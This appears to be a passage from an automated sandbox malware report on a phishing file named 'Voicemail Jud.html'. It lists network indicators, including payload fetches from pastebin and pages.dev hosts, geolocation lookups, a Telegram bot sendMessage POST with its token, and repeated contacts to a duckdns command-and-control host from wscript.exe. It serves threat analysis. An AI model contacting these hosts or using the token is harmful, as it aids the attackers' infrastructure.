Source: unknown	Network traffic detected: HTTP traffic on port 49789 -> 8426
Source: unknown	Network traffic detected: HTTP traffic on port 49790 -> 8426
Source: unknown	Network traffic detected: HTTP traffic on port 49795 -> 8426
Source: unknown	Network traffic detected: HTTP traffic on port 49796 -> 8426
Source: unknown	Network traffic detected: HTTP traffic on port 49797 -> 8426
Source: unknown	Network traffic detected: HTTP traffic on port 49799 -> 8426
Source: unknown	Network traffic detected: HTTP traffic on port 49800 -> 8426
Source: unknown	Network traffic detected: HTTP traffic on port 49801 -> 8426
Source: unknown	Network traffic detected: HTTP traffic on port 49802 -> 8426
Source: unknown	Network traffic detected: HTTP traffic on port 49803 -> 8426
Source: unknown	Network traffic detected: HTTP traffic on port 49804 -> 8426
Source: unknown	Network traffic detected: HTTP traffic on port 49805 -> 8426
Source: unknown	Network traffic detected: HTTP traffic on port 49806 -> 8426
Source: unknown	Network traffic detected: HTTP traffic on port 49807 -> 8426
Source: unknown	Network traffic detected: HTTP traffic on port 49808 -> 8426
Source: unknown	Network traffic detected: HTTP traffic on port 49809 -> 8426
Source: unknown	Network traffic detected: HTTP traffic on port 49810 -> 8426
Source: unknown	Network traffic detected: HTTP traffic on port 49811 -> 8426
Source: unknown	Network traffic detected: HTTP traffic on port 49812 -> 8426
Source: unknown	Network traffic detected: HTTP traffic on port 49813 -> 8426
Source: unknown	Network traffic detected: HTTP traffic on port 49814 -> 8426
Source: unknown	Network traffic detected: HTTP traffic on port 49815 -> 8426
Source: unknown	Network traffic detected: HTTP traffic on port 49816 -> 8426

Uses the Telegram API (likely for C&C communication)

Source: unknown	DNS query: name: api.telegram.org
Source: unknown	DNS query: name: api.telegram.org
Source: unknown	DNS query: name: api.telegram.org

Source: global traffic

TCP traffic: 192.168.2.4:49781 -> 45.133.174.75:8426

Source: Joe Sandbox View	IP Address: 199.232.192.193 199.232.192.193
Source: Joe Sandbox View	IP Address: 172.66.47.2 172.66.47.2
Source: Joe Sandbox View	IP Address: 45.133.174.75 45.133.174.75
Source: Joe Sandbox View	IP Address: 149.154.167.220 149.154.167.220

Source: Joe Sandbox View

ASN Name: ASBLANKPROXIESGB ASBLANKPROXIESGB

Source: Joe Sandbox View	JA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
Source: Joe Sandbox View	JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Joe Sandbox View	JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknown	TCP traffic detected without corresponding DNS query: 23.221.246.93
Source: unknown	TCP traffic detected without corresponding DNS query: 23.221.246.93
Source: unknown	TCP traffic detected without corresponding DNS query: 23.221.246.93
Source: unknown	TCP traffic detected without corresponding DNS query: 23.221.246.93
Source: unknown	TCP traffic detected without corresponding DNS query: 23.221.246.93
Source: unknown	TCP traffic detected without corresponding DNS query: 23.221.246.93
Source: unknown	TCP traffic detected without corresponding DNS query: 23.221.246.93
Source: unknown	TCP traffic detected without corresponding DNS query: 23.221.246.93
Source: unknown	TCP traffic detected without corresponding DNS query: 23.221.246.93
Source: unknown	TCP traffic detected without corresponding DNS query: 23.221.246.93
Source: unknown	TCP traffic detected without corresponding DNS query: 23.221.246.93
Source: unknown	TCP traffic detected without corresponding DNS query: 23.221.246.93
Source: unknown	TCP traffic detected without corresponding DNS query: 23.221.246.93
Source: unknown	TCP traffic detected without corresponding DNS query: 23.221.246.93
Source: unknown	TCP traffic detected without corresponding DNS query: 23.221.246.93
Source: unknown	TCP traffic detected without corresponding DNS query: 23.221.246.93
Source: unknown	TCP traffic detected without corresponding DNS query: 23.221.246.93
Source: unknown	TCP traffic detected without corresponding DNS query: 23.221.246.93
Source: unknown	TCP traffic detected without corresponding DNS query: 23.221.246.93
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 199.232.214.172
Source: unknown	TCP traffic detected without corresponding DNS query: 199.232.214.172
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50

Source: global traffic	HTTP traffic detected: GET /love.js HTTP/1.1Host: cloudgoogle.pages.devConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /ZU3tO.png,%20&width=450 HTTP/1.1Host: i.stack.imgur.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /ZU3tO.png,%20&width=450 HTTP/1.1Host: i.stack.imgur.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /icons/dakirby309/simply-styled/256/Microsoft-SharePoint-2013-icon.png HTTP/1.1Host: icons.iconarchive.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /icons/dakirby309/simply-styled/256/Microsoft-SharePoint-2013-icon.png HTTP/1.1Host: icons.iconarchive.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: /Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
Source: global traffic	HTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=b8bxb6t7sHH7Osr&MD=Nl6g3fCr HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: json.geoiplookup.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Origin: nullSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: json.geoiplookup.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /raw/rlcqft HTTP/1.1Host: pastie.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Origin: nullSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /raw/rlcqft HTTP/1.1Host: pastie.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /voic.txt HTTP/1.1Host: cviocemusikdanxcehal.pages.devConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Origin: nullSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: json.geoiplookup.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Origin: nullSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: json.geoiplookup.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Origin: nullSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /voic.txt HTTP/1.1Host: cviocemusikdanxcehal.pages.devConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: json.geoiplookup.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: json.geoiplookup.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Accept: /User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36Accept-Language: en-chAccept-Encoding: gzip, deflateHost: json.geoiplookup.ioConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /raw/NsQ5qTHr HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: pastebin.com
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Accept: /User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36Accept-Language: en-chAccept-Encoding: gzip, deflateHost: json.geoiplookup.ioConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /raw/NsQ5qTHr HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: pastebin.com
Source: global traffic	HTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=b8bxb6t7sHH7Osr&MD=Nl6g3fCr HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Accept: /User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateHost: json.geoiplookup.ioConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /raw/NsQ5qTHr HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: pastebin.com
Source: global traffic	HTTP traffic detected: GET /raw/NsQ5qTHr HTTP/1.1Connection: Keep-AliveAccept: /Accept-Language: en-chUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: pastebin.com
Source: global traffic	HTTP traffic detected: GET /raw/NsQ5qTHr HTTP/1.1Connection: Keep-AliveAccept: /Accept-Language: en-chUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: pastebin.com
Source: global traffic	HTTP traffic detected: GET /json/ HTTP/1.1Accept: /user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36Accept-Language: en-chAccept-Encoding: gzip, deflateHost: ip-api.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /raw/NsQ5qTHr HTTP/1.1Connection: Keep-AliveAccept: /Accept-Language: en-chUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: pastebin.com

Source: global traffic	DNS traffic detected: DNS query: i.stack.imgur.com
Source: global traffic	DNS traffic detected: DNS query: cloudgoogle.pages.dev
Source: global traffic	DNS traffic detected: DNS query: icons.iconarchive.com
Source: global traffic	DNS traffic detected: DNS query: www.google.com
Source: global traffic	DNS traffic detected: DNS query: json.geoiplookup.io
Source: global traffic	DNS traffic detected: DNS query: pastie.io
Source: global traffic	DNS traffic detected: DNS query: cviocemusikdanxcehal.pages.dev
Source: global traffic	DNS traffic detected: DNS query: api.telegram.org
Source: global traffic	DNS traffic detected: DNS query: pastebin.com
Source: global traffic	DNS traffic detected: DNS query: ip-api.com
Source: global traffic	DNS traffic detected: DNS query: masterokrwh.duckdns.org

Source: unknown

HTTP traffic detected: POST /bot7198128499:AAHSvX4jW6n9t45ItKyUTcn3TOm2bCJdS-s/sendMessage HTTP/1.1Host: api.telegram.orgConnection: keep-aliveContent-Length: 234sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-platform: "Windows"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Content-Type: application/jsonAccept: */*Origin: nullSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9

Source: Voicemail Jud.html	String found in binary or memory: http://icons.iconarchive.com/icons/dakirby309/simply-styled/256/Microsoft-SharePoint-2013-icon.png
Source: wscript.exe, 0000000C.00000003.2776352925.0000000006C83000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000003.3228222744.0000000006C75000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000003.3408815710.0000000006C75000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000003.2479805019.0000000006C84000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000003.3228443840.0000000006C75000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000002.3663596969.0000000006C75000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ip-api.com/
Source: wscript.exe, 0000000C.00000003.2776352925.0000000006C83000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000003.3228222744.0000000006C75000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000003.3408815710.0000000006C75000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000003.2479805019.0000000006C84000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000003.3228443840.0000000006C75000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000002.3663596969.0000000006C75000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ip-api.com/VF
Source: wscript.exe, 0000000B.00000003.2053554395.0000000003519000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000B.00000003.2051852371.0000000003518000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000003.2484400833.0000000006C5D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000003.2776352925.0000000006C83000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000003.3228222744.0000000006C75000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000003.3408815710.0000000006C75000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000003.2094729720.00000000038A9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000002.3663272487.0000000006493000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000003.2093975107.00000000038A8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000003.2479805019.0000000006C84000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000003.3228443840.0000000006C75000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000002.3663596969.0000000006C75000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ip-api.com/json/
Source: wscript.exe, 0000000C.00000003.2776352925.0000000006C83000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000003.3228222744.0000000006C75000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000003.3408815710.0000000006C75000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000003.2479805019.0000000006C84000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000003.3228443840.0000000006C75000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000002.3663596969.0000000006C75000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ip-api.com/json/%
Source: wscript.exe, 00000011.00000003.2444699579.00000210130B7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ip-api.com/json/43
Source: wscript.exe, 0000000C.00000003.2776352925.0000000006C83000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000003.3228222744.0000000006C75000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000003.3408815710.0000000006C75000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000003.2479805019.0000000006C84000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000003.3228443840.0000000006C75000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000002.3663596969.0000000006C75000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ip-api.com/json/W
Source: wscript.exe, 0000000B.00000003.2092865617.0000000005A1E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000002.3662661142.0000000005DCA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000011.00000002.3662635567.00000210134D5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ip-api.com/json/a
Source: wscript.exe, 0000000C.00000003.2776352925.0000000006C83000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000003.3228222744.0000000006C75000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000003.3408815710.0000000006C75000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000003.2479805019.0000000006C84000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000003.3228443840.0000000006C75000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000002.3663596969.0000000006C75000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ip-api.com/json/ycenter2
Source: wscript.exe, 0000000C.00000002.3663596969.0000000006C75000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000003.3228222744.0000000006C5E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000002.3664182847.0000000006CBF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000002.3664182847.0000000006CBA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000003.2484400833.0000000006C75000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://masterokrwh.duckdns.org:8426/is-ready
Source: wscript.exe, 0000000C.00000002.3661089635.00000000035A8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://masterokrwh.duckdns.org:8426/is-ready#
Source: wscript.exe, 0000000C.00000002.3663596969.0000000006C75000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://masterokrwh.duckdns.org:8426/is-ready1
Source: wscript.exe, 0000000C.00000003.3228222744.0000000006C75000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000003.3228443840.0000000006C75000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://masterokrwh.duckdns.org:8426/is-ready13
Source: wscript.exe, 0000000C.00000002.3663596969.0000000006C75000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://masterokrwh.duckdns.org:8426/is-ready18
Source: wscript.exe, 0000000C.00000002.3663596969.0000000006C75000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://masterokrwh.duckdns.org:8426/is-ready1I
Source: wscript.exe, 0000000C.00000003.3228222744.0000000006C75000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000003.3228443840.0000000006C75000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://masterokrwh.duckdns.org:8426/is-ready1m
Source: wscript.exe, 0000000C.00000002.3661089635.00000000035A8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://masterokrwh.duckdns.org:8426/is-ready4
Source: wscript.exe, 0000000C.00000002.3661089635.00000000035A8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://masterokrwh.duckdns.org:8426/is-ready4C
Source: wscript.exe, 0000000C.00000002.3661089635.00000000035A8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://masterokrwh.duckdns.org:8426/is-ready4E
Source: wscript.exe, 0000000C.00000002.3661089635.00000000035A8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://masterokrwh.duckdns.org:8426/is-ready4o
Source: wscript.exe, 0000000C.00000003.2776519179.0000000006C75000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000003.2484400833.0000000006C75000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://masterokrwh.duckdns.org:8426/is-ready:
Source: wscript.exe, 0000000C.00000003.3228222744.0000000006C75000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000003.2776519179.0000000006C75000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000003.3228443840.0000000006C75000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://masterokrwh.duckdns.org:8426/is-readyCreationClassName
Source: wscript.exe, 0000000C.00000002.3661089635.00000000035A8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://masterokrwh.duckdns.org:8426/is-readyI
Source: wscript.exe, 0000000C.00000002.3661089635.00000000035A8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://masterokrwh.duckdns.org:8426/is-readyP
Source: wscript.exe, 0000000C.00000002.3661089635.00000000035A8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://masterokrwh.duckdns.org:8426/is-readyT
Source: wscript.exe, 0000000C.00000002.3664182847.0000000006CBA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://masterokrwh.duckdns.org:8426/is-readyUSER
Source: wscript.exe, 0000000C.00000002.3661089635.00000000035A8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://masterokrwh.duckdns.org:8426/is-readyWdtP.
Source: wscript.exe, 0000000C.00000003.3228222744.0000000006C75000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000003.3408815710.0000000006C75000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000003.2776519179.0000000006C75000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000003.2776352925.0000000006CBF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000003.3228201928.0000000006CC2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000003.3228443840.0000000006C75000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000002.3663596969.0000000006C75000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000003.2484400833.0000000006C75000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://masterokrwh.duckdns.org:8426/is-readyZ
Source: wscript.exe, 0000000C.00000002.3661089635.0000000003659000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://masterokrwh.duckdns.org:8426/is-readycemail
Source: wscript.exe, 0000000C.00000002.3663272487.0000000006493000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://masterokrwh.duckdns.org:8426/is-readycom
